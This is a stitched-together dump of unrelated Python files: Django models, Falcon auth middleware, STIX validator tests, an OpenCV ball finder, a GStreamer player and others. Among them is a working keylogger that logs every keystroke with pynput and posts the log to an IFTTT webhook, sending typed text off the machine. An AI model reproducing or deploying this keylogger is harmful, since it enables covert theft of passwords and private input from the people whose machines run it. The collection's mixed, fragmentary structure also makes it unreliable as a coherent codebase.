self.__pointee = None
self.__pointer_to_ext_lib = False\
# ??
self._child_addr = 0
self._child_desc = None
self._child_type = None
@property
def pointee(self):
return self.__pointee
@pointee.setter
def pointee(self, pointee_field):
self.__pointee = pointee_field
def is_pointer_to_string(self):
# if hasattr(self, '_ptr_to_ext_lib'):
# return False
return self.pointee.is_string()
def is_pointer_to_ext_lib(self):
return self.__pointer_to_ext_lib
def set_pointer_to_ext_lib(self):
self.__pointer_to_ext_lib = True
def set_pointee_addr(self, addr):
self._child_addr = addr
def set_pointee_desc(self, desc):
self._child_desc = desc
def set_pointee_ctype(self, _type):
self._child_type = _type
class ArrayField(Field):
"""
Represents an array field.
"""
# , basicTypename, basicTypeSize ): # use first element to get that info
def __init__(self, name, offset, item_type, item_size, nb_item):
size = item_size * nb_item
super(ArrayField, self).__init__(name, offset, FieldTypeArray(item_type, item_size, nb_item), size, False)
def get_typename(self):
return self.field_type.name
def is_array(self):
return True
def _get_value(self, _record, maxLen=120):
return None
def to_string(self, _record, prefix=''):
item_type = self.field_type.item_type
# log.debug('P:%s I:%s Z:%s typ:%s' % (item_type.is_pointer(), item_type.is_integer(), item_type.is_zeroes(), item_type.name))
log.debug("array type: %s", item_type.name)
#
comment = '# %s array' % self.comment
fstr = "%s( '%s' , %s ), %s\n" % (prefix, self.name, self.get_typename(), comment)
return fstr
class ZeroField(ArrayField):
"""
Represents an array field of zeroes.
"""
def __init__(self, name, offset, nb_item):
super(ZeroField, self).__init__(name, offset, ZEROES, 1, nb_item)
def is_zeroes(self):
return True
class RecordField(Field, structure.AnonymousRecord):
"""
make a record field
"""
def __init__(self, parent, offset, field_name, field_type, fields):
size = sum([len(f) for f in fields])
_address = parent.address + offset
structure.AnonymousRecord.__init__(self, parent._memory_handler, _address, size, prefix=None)
Field.__init__(self, field_name, offset, FieldTypeStruct(field_type), size, False)
structure.AnonymousRecord.set_name(self, field_name)
#structure.AnonymousRecord.add_fields(self, fields)
_record_type = structure.RecordType(field_type, size,fields)
self.set_record_type(_record_type)
return
def get_typename(self):
return '%s' % self.field_type
@property
def address(self):
raise NotImplementedError('You cannot call address on a subrecord')
# def to_string(self, *args):
# # print self.fields
# fieldsString = '[ \n%s ]' % (''.join([field.to_string(self, '\t') for field in self.get_fields()]))
# info = 'rlevel:%d SIG:%s size:%d' % (self.get_reverse_level(), self.get_signature(), len(self))
# ctypes_def = '''
#class %s(ctypes.Structure): # %s
# _fields_ = %s
#
#''' % (self.name, info, fieldsString)
# return ctypes_def
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2010 British Broadcasting Corporation and Kamaelia Contributors(1)
#
# (1) Kamaelia Contributors are listed in the AUTHORS file and at
# http://www.kamaelia.org/AUTHORS - please extend this file,
# not this notice.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# experiment in ways to do services
import Axon.Component
from Axon.Ipc import shutdownMicroprocess
class ServiceTracker(object):
def __init__(self):
super(ServiceTracker,self).__init__()
self.services = {}
self.serviceUsageHandles = {}
def setupService(self, name, componentFactory, inboxname):
self.services[name] = { "factory" : componentFactory,
"inboxname" : inboxname,
"refcount" : 0,
}
def _acquireService(self, caller, name):
try:
service = self.services[name]
except KeyError:
raise "NO SUCH SERVICE AVAILABLE"
if service['refcount'] == 0:
# need to start the service
service['instance'] = service['factory']()
service['instance'].activate(caller.scheduler)
instance = service['instance']
service['refcount'] += 1
newhandle = object()
self.serviceUsageHandles[newhandle] = name
return (newhandle, (instance, service['inboxname']))
def _releaseService(self, handle):
try:
name = self.serviceUsageHandles[handle]
except KeyError:
raise "NO SUCH HANDLE"
del self.serviceUsageHandles[handle]
service = self.services[name]
service['refcount'] -= 1
if service['refcount'] == 0:
service['instance']._deliver(shutdownMicroprocess(), "control")
del service['instance']
GLOBAL_TRACKER = ServiceTracker()
# modify the existing Axon.Component.component
# ... bit messy I know, but hey!
__component_old___init__ = Axon.Component.component.__init__
__component_old__closeDownMicroprocess = Axon.Component.component._closeDownMicroprocess
def __component_new___init__(self):
__component_old___init__(self)
del self.tracker
self.tracker = GLOBAL_TRACKER
self.service_handles = []
def __component_new_acquireService(self,name):
handle, service = self.tracker._acquireService(self, name)
self.service_handles.append(handle)
return handle, service
def __component_new_releaseService(self,handle):
self.service_handles.remove(handle)
return self.tracker._releaseService(handle)
def __component_new__closeDownMicroprocess(self):
for handle in self.service_handles:
self.tracker._releaseService(handle)
return __component_old__closeDownMicroprocess(self)
Axon.Component.component.__init__ = __component_new___init__
Axon.Component.component.acquireService = __component_new_acquireService
Axon.Component.component.releaseService = __component_new_releaseService
Axon.Component.component._closeDownMicroprocess = __component_new__closeDownMicroprocess
from Axon.Component import component
# ---------------------
# now some test code
from Axon.AdaptiveCommsComponent import AdaptiveCommsComponent
class CharGen(AdaptiveCommsComponent):
Inboxes = {"inbox":"",
"control":"",
"request":"Requests for subscriptions",
}
def main(self):
self.destinations = {}
self.linkages = {}
print "Service started"
while not self.dataReady("control"):
while self.dataReady("request"):
cmd = self.recv("request")
self.handleCommand(cmd)
for outboxname in self.destinations.values():
self.send(len(self.destinations),outboxname)
yield 1
print "Service shutdown"
def handleCommand(self,cmd):
if cmd[0]=="ADD":
_, dest = cmd[1:3]
outboxname = self.addOutbox("outbox")
self.destinations[dest] = outboxname
self.linkages[dest] = self.link((self,outboxname),dest)
elif cmd[0]=="REMOVE":
_, dest = cmd[1:3]
self.unlink( thelinkage=self.linkages[dest] )
self.deleteOutbox( self.destinations[dest] )
del self.linkages[dest]
del self.destinations[dest]
class ServiceUser(component):
def __init__(self, servicename,startwhen,count):
super(ServiceUser,self).__init__()
self.servicename = servicename
self.startwhen = startwhen
self.count = count
def main(self):
n=self.startwhen
while n>0:
yield 1
n-=1
service_handle, service = self.acquireService(self.servicename)
linkage = self.link((self,"outbox"),service)
self.send(("ADD",None,(self,"inbox")), "outbox")
print "Registering"
n=self.count
while n>0:
while self.dataReady("inbox"):
msg=self.recv("inbox")
print msg,
n=n-1
self.pause()
yield 1
self.send(("REMOVE",None,(self,"inbox")), "outbox")
print "Deregistering"
self.unlink(linkage)
# self.releaseService(service_handle) # not needed, as the component tracks this
GLOBAL_TRACKER.setupService("TEST",CharGen,"request")
ServiceUser("TEST",0,10).activate()
ServiceUser("TEST",0,5).activate()
ServiceUser("TEST",0,20).activate()
ServiceUser("TEST",50,10).activate()
ServiceUser("TEST",55,10).run()
|
import argparse
import configparser
import sys
def parse():
""" Parse config file, update with command line arguments
"""
# defaults arguments
defaults = { "stratfile":"strat.txt"}
# Parse any conf_file specification
conf_parser = argparse.ArgumentParser(
description=__doc__, # printed with -h/--help
# Don't mess with format of description
formatter_class=argparse.RawDescriptionHelpFormatter,
# Turn off help, so we print all options in response to -h
add_help=False
)
conf_parser.add_argument("-c", "--conf_file",
help="Specify config file", metavar="FILE")
args, remaining_argv = conf_parser.parse_known_args()
if args.conf_file:
config = configparser.ConfigParser()
config.read([args.conf_file])
defaults.update(dict(config.items("Defaults")))
# Parse rest of arguments
parser = argparse.ArgumentParser(
# Inherit options from config_parser
parents=[conf_parser]
)
parser.set_defaults(**defaults)
parser.add_argument("--stratfile", help="""File containing the Backtrace strings.
""")
args = parser.parse_args(remaining_argv)
return args
|
from django.db import models
from django.utils import timezone
from django.contrib.auth.models import User
import datetime
class ArtistProfile(models.Model):
"""
The user, or 'artist' profile. Contains the django.contrib.auth.models.User
instance and other fields.
"""
user = models.OneToOneField(User)
avatar = models.ImageField(default='/art/placeholder.jpg')
join_date = models.DateField('date joined', default=timezone.now)
bio = models.TextField(max_length=250, default='')
def __str__(self):
return self.user.username
class Gallery(models.Model):
"""
Contains art pieces
"""
name = models.CharField(max_length=200, default='')
artist = models.ForeignKey('ArtistProfile', on_delete=models.CASCADE)
pub_date = models.DateField('date published', default=timezone.now)
description = models.TextField(max_length=1000, default='')
rating = models.IntegerField(default=0)
def __str__(self):
return self.name
class ArtPiece(models.Model):
title = models.CharField(max_length=200)
pub_date = models.DateField('date published', default=timezone.now)
image = models.ImageField()
artist = models.ForeignKey('ArtistProfile', on_delete=models.CASCADE)
gallery = models.ForeignKey('Gallery', on_delete=models.CASCADE)
stars = models.IntegerField(default=0)
description = models.TextField(max_length=1000, default='')
def __str__(self):
return self.title
|
from flask import Blueprint
assign = Blueprint('assign', __name__)
from . import get_info
from . import assign_partner
|
import cv2
import numpy as np
import math
import ConfigParser
import socket
import sys
"""
looks for blobs. calculates the center of mass (centroid) of the biggest blob. sorts into ball and bumper, then send over tcp
"""
#parse config stuff
config = ConfigParser.RawConfigParser()
config.read("../vision.conf")
exposure = int(config.get('camera','exposure'))
height = int(config.get('camera','height'))
width = int(config.get('camera','width'))
hue_lower = int(config.get('pyballfinder','hue_lower'))
hue_upper = int(config.get('pyballfinder','hue_upper'))
saturation_lower = int(config.get('pyballfinder','saturation_lower'))
saturation_upper = int(config.get('pyballfinder','saturation_upper'))
value_lower = int(config.get('pyballfinder','value_lower'))
value_upper = int(config.get('pyballfinder','value_upper'))
min_contour_area = int(config.get('pyballfinder','min_contour_area'))
area_difference_to_area_for_circle_detect = int(config.get('pyballfinder','area_difference_to_area_for_circle_detect'))
skip_gui = len(sys.argv) >= 2 and sys.argv[1] == "--nogui"
#set up camera
camera = cv2.VideoCapture(0)
camera.set(cv2.cv.CV_CAP_PROP_EXPOSURE,exposure) #time in milliseconds. 5 gives dark image. 100 gives bright image.
camera.set(cv2.cv.CV_CAP_PROP_FRAME_WIDTH,width)
camera.set(cv2.cv.CV_CAP_PROP_FRAME_HEIGHT,height)
print camera.get(3),camera.get(4)
#set up server
crio_ip = config.get('network_communication','crio_ip')
crio_tcp_loc_coords_port = int(config.get('network_communication','crio_tcp_loc_coords_port'))
send_over_network = (config.get('pyballfinder','send_over_network'))
#set up socket connection - server
if(send_over_network == "True"):
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((crio_ip, crio_tcp_loc_coords_port))
"""
does two checks to figure out if it's a circle. First: calculate the area and perimeter of the contour using opencv. Then, calculate the area using the perimeter. Are those two values similar?
Then:find the minimum and maximum radius of the contour. Are they similar?
"""
def is_contour_a_ball(contour,real_area,perimeter,(cx,cy)):
calculated_area=math.pow((perimeter/(2*math.pi)),2)*math.pi
area_difference=abs(real_area-calculated_area)
area_difference_to_area=int(area_difference/real_area*10)
min_radius = 99999999
max_radius = 0
for coord in contour:
dist_from_center = math.sqrt((coord[0][0]-cx)**2+(coord[0][1]-cy)**2)
if dist_from_center < min_radius:
min_radius=dist_from_center
if dist_from_center > max_radius:
max_radius=dist_from_center
if(min_radius<=0):
min_radius=1
check_one = area_difference_to_area<area_difference_to_area_for_circle_detect
check_two = max_radius/min_radius < 3
return check_one and check_two # True if circle
while(1):
_,capture = camera.read()
capture = cv2.flip(capture,1)
# Convert image to HSV plane using cvtColor() function
hsvcapture = cv2.cvtColor(capture,cv2.COLOR_BGR2HSV)
# turn it into a binary image representing yellows
inrangepixels = cv2.inRange(hsvcapture,np.array((hue_lower,saturation_lower,value_lower)),np.array((hue_upper,saturation_upper,value_upper)))#in opencv, HSV is 0-180,0-255,0-255
# Apply erosion and dilation and erosion again to eliminate noise and fill in gaps
dilate = cv2.dilate(inrangepixels,None,iterations = 5)
erode = cv2.erode(dilate,None,iterations = 10)
dilatedagain = cv2.dilate(erode,None,iterations = 5)
# find the contours
tobecontourdetected = dilatedagain.copy()
contours,hierarchy = cv2.findContours(tobecontourdetected,cv2.RETR_LIST,cv2.CHAIN_APPROX_SIMPLE)
message = ""
for contour in contours:
real_area = cv2.contourArea(contour)
if real_area > min_contour_area:
perimeter = cv2.arcLength(contour, True)
M = cv2.moments(contour) #an image moment is the weighted average of a blob
cx,cy = int(M['m10']/M['m00']), int(M['m01']/M['m00'])
cv2.circle(capture,(cx,cy),5,(0,0,255),-1)
type = ""
if is_contour_a_ball(contour,real_area,perimeter,(cx,cy)):
if(not skip_gui):
cv2.putText(capture,"Ball",(cx,cy),cv2.FONT_HERSHEY_SIMPLEX,3,(0,0,255))
type = "BALL"
else:
cv2.putText(capture,"Bumper",(cx,cy),cv2.FONT_HERSHEY_SIMPLEX,3,(0,0,255))
type = "BUMP"
message+=(type + "," + str(cx) + "," + str(cy) +"," + str(int(real_area)) + ";\n")
if(message and send_over_network == "True"):
s.send(message)
# show our image during different stages of processing
if(not skip_gui):
cv2.imshow('capture',capture)
cv2.imshow('erodedbinary',dilatedagain)
if cv2.waitKey(1) == 27:
break
s.close()
cv2.destroyAllWindows()
camera.release()
|
from falcon import falcon
from core.sys_modules.authentication.UserServices import UserServices
from core.base_resource import BaseResource
from settings.settings import SETTINGS
class AuthenticationMiddleware(object):
"""
Authentication middleware class
"""
URL_WHITE_LIST = [
'/v1/users/logout',
'/v1/users/login',
'/v1/users/register',
'/login',
'/access-denied'
]
EXTENSION_WHITELIST = [
'.css',
'.js',
'.png',
'.svg',
'.jpg',
'.ico'
]
def process_request(self, req, resp):
"""
Args:
req:
resp:
Returns:
"""
if req.method != 'OPTIONS':
if SETTINGS['AUTHENTICATION']['ENABLE_SYS_AUTHENTICATION'] is True:
url = req.relative_uri
is_file = False
for ext in self.EXTENSION_WHITELIST:
if ext in url:
is_file = True
break
if url not in self.URL_WHITE_LIST and not is_file:
content_type = '' if req.content_type is None else req.content_type
accept = '' if req.accept is None else req.accept
cookies = req.cookies
valid = False
if 'token' in cookies:
token = cookies['token']
valid = UserServices.validate(token)
if not valid:
if 'json' in content_type or 'json' in accept:
resp.status = falcon.HTTP_404
resp.content_type = 'application/json'
resp.unset_cookie('token')
raise falcon.HTTPUnauthorized('Access denied', 'in order to continue please log in')
else:
redirect = req.relative_uri
if 'logout' not in redirect and 'access-denied' not in redirect:
resp.set_cookie('redirect', redirect.strip('\"'), max_age=600, path='/', http_only=False)
else:
resp.unset_cookie('redirect')
raise falcon.HTTPTemporaryRedirect('/login')
@falcon.after(BaseResource.conn.close)
def process_resource(self, req, resp, resource, params):
"""
Process resource
:param req:
:param resp:
:param resource:
:param params:
:return:
"""
url = req.relative_uri
if url not in self.URL_WHITE_LIST:
try:
access = getattr(resource, 'group_access')
except AttributeError:
access = []
if len(access) != 0:
token = None if 'token' not in req.cookies else req.cookies['token']
if token is not None and token != '':
data = UserServices.get_data_from_token(token)
payload = {} if 'payload' not in data else data['payload']
if 'permissions' in payload:
permissions = payload['permissions']
has_permissions = False
for permission in permissions:
if permission['group_name'] in access:
has_permissions = True
break
if not has_permissions:
content_type = '' if req.content_type is None else req.content_type
if 'json' in content_type:
BaseResource.conn.close()
raise falcon.HTTPUnauthorized(
"Access denied",
"You don't have sufficient permissions to view this resource")
else:
BaseResource.conn.close()
raise falcon.HTTPTemporaryRedirect('/access-denied')
BaseResource.conn.close()
@falcon.after(BaseResource.conn.close)
def process_response(self, req, resp):
"""
Close the db connection after the request is processed
:param req:
:param resp:
:return:
"""
pass
|
# -*- coding: utf-8 -*-
"""
Created by Huang
Date: 2018/9/5
"""
from rest_framework import serializers
# class GoodsSerializer(serializers.Serializer):
# """
# Serializer实现商品列表页
# """
# name = serializers.CharField(required=True, max_length=100)
# click_num = serializers.IntegerField(default=0)
# goods_front_image = serializers.ImageField()
from goods.models import Goods, GoodCategory
class CategorySerializer(serializers.ModelSerializer):
"""
商品类型序列化
"""
class Meta:
model = GoodCategory
fields = '__all__'
class GoodsSerializer(serializers.ModelSerializer):
"""
商品序列化
"""
category = CategorySerializer()
class Meta:
model = Goods
fields = '__all__'
class CategorySerializer3(serializers.ModelSerializer):
"""
三级分类
"""
class Meta:
model = GoodCategory
fields = '__all__'
class CategorySerializer2(serializers.ModelSerializer):
"""
二级分类
"""
sub_cat = CategorySerializer3(many=True)
class Meta:
model = GoodCategory
fields = '__all__'
class CategorySerializer(serializers.ModelSerializer):
"""
商品一级类别序列化
"""
sub_cat = CategorySerializer2(many=True) # 'many=True'表示不止一个二级分类
class Meta:
model = GoodCategory
fields = "__all__"
|
import copy
import json
from . import ValidatorTest
from .. import validate_parsed_json, validate_string
VALID_RELATIONSHIP = u"""
{
"type": "relationship",
"id": "relationship--44298a74-ba52-4f0c-87a3-1824e67d7fad",
"created_by_ref": "identity--f431f809-377b-45e0-aa1c-6a4751cae5ff",
"created": "2016-04-06T20:06:37.000Z",
"modified": "2016-04-06T20:06:37.000Z",
"source_ref": "indicator--8e2e2d2b-17d4-4cbf-938f-98ee46b3cd3f",
"target_ref": "malware--31b940d4-6f7f-459a-80ea-9c1f17b5891b",
"relationship_type": "indicates"
}
"""
class RelationshipTestCases(ValidatorTest):
valid_relationship = json.loads(VALID_RELATIONSHIP)
def test_wellformed_relationship(self):
results = validate_string(VALID_RELATIONSHIP, self.options)
self.assertTrue(results.is_valid)
def test_relationship_type(self):
relationship = copy.deepcopy(self.valid_relationship)
relationship['relationship_type'] = "SOMETHING"
results = validate_parsed_json(relationship, self.options)
self.assertEqual(results.is_valid, False)
def test_source_relationship(self):
relationship = copy.deepcopy(self.valid_relationship)
relationship['source_ref'] = "relationship--31b940d4-6f7f-459a-80ea-9c1f17b5891b"
results = validate_parsed_json(relationship, self.options)
self.assertEqual(results.is_valid, False)
self.assertEqual(len(results.errors), 1)
def test_source_sighting(self):
relationship = copy.deepcopy(self.valid_relationship)
relationship['source_ref'] = "sighting--31b940d4-6f7f-459a-80ea-9c1f17b5891b"
results = validate_parsed_json(relationship, self.options)
self.assertEqual(results.is_valid, False)
def test_target_bundle(self):
relationship = copy.deepcopy(self.valid_relationship)
relationship['target_ref'] = "bundle--31b940d4-6f7f-459a-80ea-9c1f17b5891b"
results = validate_parsed_json(relationship, self.options)
self.assertEqual(results.is_valid, False)
self.assertEqual(len(results.errors), 1)
def test_target_marking_definition(self):
relationship = copy.deepcopy(self.valid_relationship)
relationship['target_ref'] = "marking-definition--31b940d4-6f7f-459a-80ea-9c1f17b5891b"
results = validate_parsed_json(relationship, self.options)
self.assertEqual(results.is_valid, False)
def test_relationship_types_invalid_type(self):
relationship = copy.deepcopy(self.valid_relationship)
relationship['source_ref'] = "malware--31b940d4-6f7f-459a-80ea-9c1f17b5891b"
relationship['target_ref'] = "campaign--9c1f891b-459a-6f7f-80ea-31b940d417b5"
relationship['relationship_type'] = "mitigates"
results = validate_parsed_json(relationship, self.options)
self.assertEqual(results.is_valid, False)
self.check_ignore(relationship, 'relationship-types')
def test_relationship_types_invalid_source(self):
relationship = copy.deepcopy(self.valid_relationship)
relationship['source_ref'] = "identity--b5437038-eb96-4652-88bc-5f94993b7326"
self.assertFalseWithOptions(relationship)
def test_relationship_types_invalid_target(self):
relationship = copy.deepcopy(self.valid_relationship)
relationship['target_ref'] = "report--af0976b2-e8f3-4646-8026-1cf4d0ce4d8a"
self.assertFalseWithOptions(relationship)
def test_relationship_types_valid(self):
relationship = copy.deepcopy(self.valid_relationship)
relationship['source_ref'] = "tool--31b940d4-6f7f-459a-80ea-9c1f17b5891b"
relationship['target_ref'] = "vulnerability--9c1f891b-459a-6f7f-80ea-31b17b5940d4"
relationship['relationship_type'] = "targets"
results = validate_parsed_json(relationship, self.options)
self.assertTrue(results.is_valid)
def test_relationship_types_common(self):
relationship = copy.deepcopy(self.valid_relationship)
relationship['source_ref'] = "malware--31b940d4-6f7f-459a-80ea-9c1f17b5891b"
relationship['target_ref'] = "campaign--9c1f891b-459a-6f7f-80ea-31b940d417b5"
relationship['relationship_type'] = "related-to"
results = validate_parsed_json(relationship, self.options)
self.assertTrue(results.is_valid)
def test_missing_required(self):
relationship = copy.deepcopy(self.valid_relationship)
del relationship['relationship_type']
self.assertFalseWithOptions(relationship)
|
#!/usr/bin/env python3
from pynput.keyboard import Listener
import socket
import os
import pwd
import requests
'''
The logfile location may vary upon the user which is running
the software. With that in mind, i wrote this function to harvest
this info and use it during runtime
'''
userdata = pwd.getpwuid(os.getuid())
# retorna uma lista com alguns dados interessantes :v
username = userdata[0]
logFile = userdata[5] + '/log'
key = "Your IFTTT Webhooks' key here"
event = "The event name you've created"
url = "https://maker.ifttt.com/trigger/" + event + "/with/key/" + key
#Debug. Did you do this step properly?
#print(url)
def request():
with open(logFile, "r+") as file:
log = file.read()
if len(log) > 100:
payload = {"value1":log}
r = requests.post(url, data=payload)
if r.status_code == 200:
file.truncate(0)
else:
print(r.status_code)
def writeLog(key):
keydata = str(key)
'''
writeLog() is the "main" function.
It reads the pressed keystrokes via listener and write them to a temporary log file
If you want, you can edit the program to erase this log file in case of a unexpected exit. Good luck :)
This is a dictionary to translate some of the key presses returned by the listener
'''
translate_keys = {
"Key.space": " ",
"Key.shift_r": "[SHIFT]",
"Key.shift_l": "[SHIFT]",
"Key.enter": "\n",
"Key.alt": "[ALT]",
"Key.esc": "[ESC]",
"Key.cmd": "[CMD]",
"Key.caps_lock": "[CAPS]",
"Key.backspace": "[BACKSPACE]",
"Key.tab": "[TAB]",
"Key.ctrlc":"[CTRL+C]"
}
'''
it removes those annoying quotes from every character
'''
keydata = keydata.replace("'", "")
#Checks if any translation is needed
for key in translate_keys:
keydata = keydata.replace(key, translate_keys[key])
#Opens file in append mode
with open(logFile, "a") as file:
file.write(keydata)
request()
#This is the event listener which cheks the keystrokes and call the function writeLog() if any
while True:
with Listener(on_press=writeLog) as l:
l.join()
|
"""
Tfchain Client
"""
from Jumpscale import j
from json import dumps
from JumpscaleLib.clients.blockchain.tfchain.errors import InvalidTfchainNetwork, NoExplorerNetworkAddresses
from JumpscaleLib.clients.blockchain.tfchain.TfchainNetwork import TfchainNetwork
from JumpscaleLib.clients.blockchain.rivine.RivineWallet import RivineWallet
TEMPLATE = """
network = "{}"
seed_ = ""
explorers = {}
password = ""
nr_keys_per_seed = 1
""".format(
TfchainNetwork.STANDARD.name.lower(),
dumps(TfchainNetwork.STANDARD.official_explorers()))
# JSConfigBase = j.tools.configmanager.JSBaseClassConfig
JSConfigBase = j.tools.configmanager.base_class_config
class TfchainClient(JSConfigBase):
"""
Tfchain client object
"""
def __init__(self, instance, data=None, parent=None, interactive=False):
"""
Initializes a new Tfchain Client
"""
if not data:
data = {}
JSConfigBase.__init__(self, instance, data=data, parent=parent,
template=TEMPLATE, interactive=interactive)
self._wallet = None
@property
def wallet(self):
if self._wallet is None:
client = j.clients.tfchain.get(self.instance, create=False)
# Load the correct config params specific to the network
network = TfchainNetwork(self.config.data['network'])
if not isinstance(network, TfchainNetwork):
raise InvalidTfchainNetwork("invalid tfchain network specified")
minerfee = network.minimum_minerfee()
explorers = self.config.data['explorers']
if not explorers:
explorers = network.official_explorers()
if not explorers:
raise NoExplorerNetworkAddresses(
"network {} has no official explorer networks and none were specified by callee".format(network.name.lower()))
# Load a wallet from a given seed. If no seed is given,
# generate a new one
seed = self.config.data['seed_']
if seed == "":
seed = self.generate_seed()
# Save the seed in the config
data = dict(self.config.data)
data['seed_'] = seed
cl = j.clients.tfchain.get(instance=self.instance,
data=data,
create=True,
interactive=False)
cl.config.save()
# make sure to set the seed in the current object.
# if not, we'd have a random non persistent seed until
# the first reload
self.config.data['seed_'] = seed
self._wallet = RivineWallet(seed=seed,
bc_networks=explorers,
bc_network_password=self.config.data['password'],
nr_keys_per_seed=self.config.data['nr_keys_per_seed'],
minerfee=minerfee,
client=client)
return self._wallet
def generate_seed(self):
"""
Generate a new seed
"""
return j.data.encryption.mnemonic.generate(strength=256)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Sep 14 17:38:42 2015
@author: pavel
"""
import os
import time
import threading
from sys import argv
import gi
gi.require_version('Gst', '1.0')
from gi.repository import GObject, Gst
from urllib.parse import urljoin
from urllib.request import pathname2url
GObject.threads_init()
Gst.init(None)
class Player:
def __init__(self, volume = 1.0, callback_on_stop=None, callback_on_progress=None):
""" constructor
volume[optional] : initial player volume
callback_on_stop[optional] : function(file_url) to be called
after record was stopped
callback_on_progress[optional] : function(file_url, file_duration, position_so_far)
to be called at each position update """
self.active = False
self.volume = volume
self.callback_on_stop = callback_on_stop
self.callback_on_progress = callback_on_progress
self.track = None
self.track_duration = None
self.player = Gst.ElementFactory.make('playbin', 'player')
self.bus = self.player.get_bus()
self.bus.add_signal_watch()
self.watch_id = self.bus.connect("message", self.message_handler)
self.set_volume(volume)
#self.control = Gst.Controller(src, "freq", "volume")
#GObject.MainLoop().run()
self.auto_polling_enabled = False
def start_polling(self, polling_interval=1, forcedCheck = False):
""" function to be called every polling_interval seconds if player is playing
functions should takes as parameters file_url, track_length, current_position"""
def poll():
while self.auto_polling_enabled:
time.sleep(polling_interval)
if self.track is not None \
and self.is_active(forcedCheck) \
and self.is_playing():
self.on_progress_update()
if not self.auto_polling_enabled:
self.auto_polling_enabled = True
self.selfcheck_thread = threading.Thread(target=poll)
self.selfcheck_thread.daemon = True
self.selfcheck_thread.start()
return True
return False
def stop_polling(self):
self.auto_polling_enabled = False
def close(self):
""" destructor """
print("destruction...")
self.stop_polling()
self.stop()
#if self.bus is not None:
self.bus.remove_signal_watch()
self.bus.disconnect(self.watch_id)
def _path2url(self, path):
return urljoin('file:', pathname2url(os.path.abspath(path)))
def load_track(self, path):
""" add track to player
path : path to the file
will return url to the file"""
if self.track is not None:
self.stop()
self.track = self._path2url(path)
self.player.set_property('uri', self.track)
return self.track
def stop(self):
if self.active:
print(self.track + " stopped")
self.player.set_state(Gst.State.NULL)
self.active = False
if self.callback_on_stop is not None:
self.callback_on_stop(self.track)
self.track_duration = None
def play(self):
""" start playing """
print(self.track + " playing")
self.player.set_state(Gst.State.PLAYING)
self.active = True
def pause(self):
""" pause """
print(self.track + " paused")
self.player.set_state(Gst.State.PAUSED)
def resume(self):
""" resume playing """
print(self.track + " resumed")
self.player.set_state(Gst.State.PLAYING)
def set_volume(self, volume):
""" set track volume to value in [0.0 1.0]"""
self.volume = volume
self.player.set_property('volume', self.volume)
def get_volume(self):
""" get track volume """
return self.volume
def mute(self):
""" """
self.player.set_property('volume', 0.0)
def unmute(self):
""" """
self.player.set_property('volume', self.volume)
def get_duration(self):
""" get duration in seconds"""
if self.track_duration is None:
self.track_duration = self.player.query_duration(Gst.Format.TIME)[1] /Gst.SECOND
return self.track_duration
def get_position(self):
""" get position in seconds"""
return self.player.query_position(Gst.Format.TIME)[1] /Gst.SECOND
def set_position(self, position):
""" set current position to position in seconds"""
self.player.seek_simple(Gst.Format.TIME, Gst.SeekFlags.FLUSH
| Gst.SeekFlags.KEY_UNIT, position * Gst.SECOND)
def _get_state(self):
status, state, pending = self.player.get_state(Gst.CLOCK_TIME_NONE)
#print status, state, pending
return state
def is_active(self, forcedCheck = True):
""" return true if is playing or on pause"""
if forcedCheck:
self.check_messages()
return self.active
def is_paused(self):
return self._get_state() == Gst.State.PAUSED
def is_playing(self):
return self._get_state() == Gst.State.PLAYING
def message_handler(self, bus, message):
# Capture the messages on the bus and
# set the appropriate flag.
if message is None: return
msgType = message.type
print(msgType, message)
if msgType == Gst.MessageType.ERROR:
self.stop()
print("Unable to play audio. Error: ", message.parse_error())
elif msgType == Gst.MessageType.EOS:
self.stop()
def check_messages(self):
""" manually check messages"""
types = Gst.MessageType.EOS | Gst.MessageType.ERROR
self.message_handler(self.bus ,self.bus.pop_filtered (types))
def on_progress_update(self):
self.callback_on_progress(self.track, self.get_duration(), self.get_position())
def play(f_names):
f_names.append("./test.mp3")
def callback_on_stop(file_url):
print("end of " + file_url)
def callback_on_progress(file_url, dur, pos):
print(str(pos)+' / ' + str(dur))
pl = Player(volume = 0.2, callback_on_stop=callback_on_stop)
#pl.start_polling(forcedCheck=True)
for f_name in f_names:
if os.path.isfile(f_name):
print("Loading", pl.load_track(f_name))
pl.play()
time.sleep(1)
print('Duration : '+ str(pl.get_duration()))
while pl.is_active():
print('Position : '+ str(pl.get_position()), end='\r')
time.sleep(1)
pl.stop()
print()
pl.close()
if __name__ == "__main__":
play(argv[1:])
|
from Code.pca_variance import demo_variance_explained_curve
# Try the demo thing
demo_variance_explained_curve()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.